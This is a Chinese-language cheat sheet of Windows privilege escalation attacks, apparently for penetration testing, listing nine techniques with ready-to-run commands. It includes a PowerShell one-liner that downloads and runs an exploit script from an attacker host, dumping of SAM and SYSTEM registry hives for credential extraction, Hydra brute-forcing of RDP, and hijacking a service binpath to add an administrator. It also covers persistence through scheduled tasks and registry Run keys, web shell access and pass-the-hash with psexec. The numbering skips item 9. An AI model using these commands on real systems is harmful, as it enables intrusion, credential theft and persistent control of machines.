1.CVE-2016-0099 (MS16-032)
这是一个Windows内核特权提升漏洞,利用该漏洞可以获得系统权限。
# 使用公开的POC进行利用,如
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>/Invoke-MS16-032.ps1'); Invoke-MS16-032
2.CVE-2021-36934
也被称为HiveNightmare或SeriousSAM漏洞,通过不安全的SAM文件权限提升特权。
# 利用公开的POC
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
reg save HKLM\SECURITY security.hive
python3 secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL
3.利用弱密码
尝试通过弱密码或默认密码进行暴力破解。
# 使用工具如Hydra进行暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://<target_ip>
4.Unquoted Service Path
某些服务在配置时路径未加引号,攻击者可以利用这些路径在系统路径中插入恶意可执行文件。
# 查找未加引号的服务路径
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# 在漏洞路径中放置恶意可执行文件
copy malicious.exe "C:\Program Files\Vulnerable Service\malicious.exe"
5.Insecure Service Permissions
检查服务的权限设置,如果权限设置不当,普通用户可以修改服务配置或执行恶意代码。
# 使用accesschk工具检查服务权限
accesschk.exe -uwcqv "Authenticated Users" *
# 如果发现某服务权限不当,可以进行提权操作
sc config <service_name> binpath= "cmd.exe /c net localgroup administrators <username> /add"
sc stop <service_name>
sc start <service_name>
6.Task Scheduler
如果计划任务配置不当,可以修改任务以执行恶意代码。
# 列出计划任务
schtasks /query /fo LIST /v
# 修改任务执行恶意代码
schtasks /change /tn "\Microsoft\Windows\Backup\MyTask" /tr "C:\malicious.exe"
7.注册表启动项
修改注册表启动项,增加恶意代码。
# 使用reg命令修改注册表启动项
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "C:\malicious.exe" /f
8.利用IIS配置错误
通过文件上传漏洞上传Web Shell并执行。
# 上传Web Shell
# 在浏览器中访问Web Shell,执行系统命令
http://<target_ip>/uploads/webshell.aspx
10.Pass-the-Hash
利用哈希值直接进行身份验证,而无需明文密码。
# 使用impacket工具包中的psexec.py
psexec.py -hashes <NTLM_hash> <domain>/<user>@<target_ip>